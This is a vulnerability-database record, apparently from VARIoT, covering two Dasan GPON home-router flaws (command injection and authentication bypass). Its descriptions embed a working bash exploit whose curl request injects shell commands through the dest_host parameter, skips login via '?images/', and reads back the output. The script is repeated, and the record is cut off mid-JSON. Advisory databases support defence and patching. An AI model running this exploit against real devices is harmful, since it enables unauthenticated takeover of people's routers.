9 vulnerabilities by dasannetworks
VAR-201805-0263
Vulnerability from variot - Updated: 2025-11-18 15:27
An issue was discovered on Dasan GPON home routers. Command injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers contain a command injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the 'dest_host' parameter to the GponForm/diag_Form URI. Multiple Dasan GPON routers are prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. The references for this entry also list CVE-2018-10561 (the authentication bypass) and the CISA Known Exploited Vulnerabilities catalog.
#!/bin/bash
echo "[+] Sending the Commanda| "
We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0263",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gpon router",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "gpon routers",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon router",
"scope": "eq",
"trust": 0.3,
"vendor": "dasan",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:gpon_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "None",
"sources": [
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.9
},
"cve": "CVE-2018-10562",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-10562",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09165",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120334",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-10562",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10562",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-10562",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2018-10562",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-10562",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09165",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-188",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120334",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10562",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it\u0027s quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \\342\\200\\230dest_host\\342\\200\\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10562"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "PACKETSTORM",
"id": "147482"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-120334",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10562",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "44576",
"trust": 2.6
},
{
"db": "BID",
"id": "107053",
"trust": 2.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-09165",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120334",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10562",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "147482",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"id": "VAR-201805-0263",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
}
]
},
"last_update_date": "2025-11-18T15:27:33.715000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "GPon router remote command execution vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/128481"
},
{
"title": "Dasan GPON Home router command injection vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79884"
},
{
"title": "Pingpon-Exploit",
"trust": 0.1,
"url": "https://github.com/649/Pingpon-Exploit "
},
{
"title": "GPON_RCE",
"trust": 0.1,
"url": "https://github.com/c0ld1/GPON_RCE "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/Truongnn92/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/f3d0x0/GPON "
},
{
"title": "GPON-LOADER",
"trust": 0.1,
"url": "https://github.com/Choudai/GPON-LOADER "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/manyunya/GPON "
},
{
"title": "GPON",
"trust": 0.1,
"url": "https://github.com/ethicalhackeragnidhra/GPON "
},
{
"title": "GPON-home-routers-Exploit",
"trust": 0.1,
"url": "https://github.com/vhackor/GPON-home-routers-Exploit "
},
{
"title": "CVE-2018-10562",
"trust": 0.1,
"url": "https://github.com/ATpiu/CVE-2018-10562 "
},
{
"title": "awesome-network-stuff",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/awesome-network-stuff "
},
{
"title": "awesome-network-stuff",
"trust": 0.1,
"url": "https://github.com/aniksarakash/awesome-network-stuff "
},
{
"title": "MS17-010",
"trust": 0.1,
"url": "https://github.com/oneplus-x/MS17-010 "
},
{
"title": "Exp101tsArchiv30thers",
"trust": 0.1,
"url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers "
},
{
"title": "CVE-POC",
"trust": 0.1,
"url": "https://github.com/0xT11/CVE-POC "
},
{
"title": "awesome-cve-poc_qazbnm456",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "PoC-in-GitHub",
"trust": 0.1,
"url": "https://github.com/nomi-sec/PoC-in-GitHub "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.securityfocus.com/bid/107053"
},
{
"trust": 2.7,
"url": "https://www.exploit-db.com/exploits/44576/"
},
{
"trust": 2.1,
"url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2018-10562"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10562"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10652"
},
{
"trust": 0.3,
"url": "http://www.dasannetworks.com/en/"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
},
{
"trust": 0.3,
"url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://github.com/649/pingpon-exploit"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"db": "VULHUB",
"id": "VHN-120334"
},
{
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "PACKETSTORM",
"id": "147482"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULHUB",
"id": "VHN-120334"
},
{
"date": "2018-05-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2018-05-04T00:32:22",
"db": "PACKETSTORM",
"id": "147482"
},
{
"date": "2018-05-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"date": "2018-05-04T03:29:00.287000",
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-01-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09165"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-120334"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10562"
},
{
"date": "2019-02-18T00:00:00",
"db": "BID",
"id": "107053"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-188"
},
{
"date": "2018-06-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004886"
},
{
"date": "2025-11-05T19:23:09.917000",
"db": "NVD",
"id": "CVE-2018-10562"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON home routers Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004886"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-188"
}
],
"trust": 0.6
}
}
VAR-201805-0262
Vulnerability from variot - Updated: 2025-11-18 15:27
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. The Dasan GPON home router contains an authentication vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). An attacker could exploit the vulnerability to bypass authentication by adding '?images' to any of the device's URLs. Multiple Dasan GPON routers are prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. The command-injection issue is tracked in this listing as CVE-2018-10562 (VAR-201805-0263).
#!/bin/bash
echo "[+] Sending the Commanda| "
We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`$2`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\n/\n/ga
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0262",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gpon router",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "gpon routers",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon",
"scope": null,
"trust": 0.6,
"vendor": "dasan",
"version": null
},
{
"model": "networks gpon router",
"scope": "eq",
"trust": 0.3,
"vendor": "dasan",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09230"
},
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
},
{
"db": "NVD",
"id": "CVE-2018-10561"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:gpon_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004885"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "None",
"sources": [
{
"db": "BID",
"id": "107053"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-189"
}
],
"trust": 0.9
},
"cve": "CVE-2018-10561",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-10561",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09230",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-120333",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-10561",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
